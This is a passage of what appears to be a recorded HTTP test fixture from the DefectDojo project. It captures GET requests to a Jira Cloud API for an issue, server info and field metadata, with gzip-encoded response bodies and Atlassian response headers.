Uc+XaUwucwvGJHkM55FyVQr2jMePV+7IK3Kyv926H77F7QHA4VvcHiIcusXApES38IYhNyHyyky/ + KJ8ItXWnrXHtBsCL7Zd1KQrevwEUxYvHxKOhFVZtJpMeM34z5Lo0iHuEgte/9CMUvIbFRyjohII2 + uQCV6j2s6cyGksD2O52KDzQIN88+FIqKLfG0Q0rXbM63s7n2gp11tRcsheP5Ki1FrumOaf1r8+eL + /vgsS9FsKgkPm0eDgi9AvsbfRv2N3PNexn5947JekuCGbjVoKatZpe1Yieq/jWa1LCsTqtCvfhdq + TGWHwaJUwx/SaO3YNjbcstYcUN5Zr9d/AQAA//8DANEYBuTDGwAA + headers: + ATL-TraceId: + - c444a4e58d8011c7 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:02 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 0d5ae827-d359-45bc-b35d-1665435b4d0e + x-envoy-upstream-service-time: + - '176' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10611 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - bb78e6f9bf26d7d5 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:02 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - c60f6a7d-92ef-4a07-83be-765867ab4f38 + x-envoy-upstream-service-time: + - '123' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPwWrDMBBE/0XX2s5KkexYt9Ie2lLSgp1TCUW2V9RFlowlF0LIv1eigfS2M/tm + hz2TTnk8LIZI8hXC7OVmM6DGPgzu2xUqGOX9qGxhMZCM/ODiR2cjTAFoAQXkzf7+vXl6a2/b/Tp1 + cSLyI0EZZHDMyICzcacJbWhPM8YDD8atQwx162iGvwiRKSD41XxUIYEMGM2B5axsKZWsklteAMAd + RDjmPS6xtx2nG7vNgbYMJBcSRMHqG9tPz1a7CPJSiEpTrRH5rq614kmjohUrxY5FwURfl/W/gmBS + w8u4KJLe0Wo14dX1KtlnYq4TQft5aMjl8gsAAP//AwA2dHzYWgEAAA== + headers: + ATL-TraceId: + - 5a5021dc239e53c9 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:05 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b3c2558f-ba74-4e3b-8f09-34f049d032fd + x-envoy-upstream-service-time: + - '26' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 91003b718a5f09d3 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:05 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 91de1c11-b83d-49fc-a447-375e614cac95 + x-envoy-upstream-service-time: + - '68' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJtmm3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvW7369TF + ici3BGWQwXtGBpyNO05oQ3ucMR64M24dYqhbRzP8RohMAVFczHsVEsiBsxx4zsuWMckruS0oANxA + hGPe4xJ723G6stscWMtBFkKCoKKs/th+erTaRbAohag00xqx2NW1VkXSqFjFS7HjUXDR12X9ryCY + 1PA0Loqkd7RaTXh2vUr2iZjLRNB+HBpyPv8AAAD//wMAZdHXP1oBAAA= + headers: + ATL-TraceId: + - ba9dfeceb6028a42 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:05 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 3870b290-391c-472f-aa8d-2daa6d52ab03 + x-envoy-upstream-service-time: + - '32' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - b9c23c8c35a02dba + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:05 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + 